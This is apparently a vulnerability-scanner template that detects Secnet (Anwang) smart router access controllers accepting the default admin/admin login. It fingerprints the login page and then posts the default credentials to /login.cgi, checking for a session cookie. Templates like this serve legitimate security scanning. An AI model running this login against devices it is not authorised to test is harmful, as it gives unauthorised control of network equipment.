id: secnet-ac-default-password

info:
    name: Secnet AC Default Password
    author: iak3ec(https://github.com/nu0l)
    severity: high

rules:
  uc1:
    request:
      method: GET
      path: /login.html
    expression: response.status == 200 && response.body.bcontains(b"<title>安网科技-智能路由系统</title>")
  uc2:
    request:
      method: POST
      path: /login.cgi
      body:
        user=admin&password=admin
    expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
expression: uc1() && uc2()
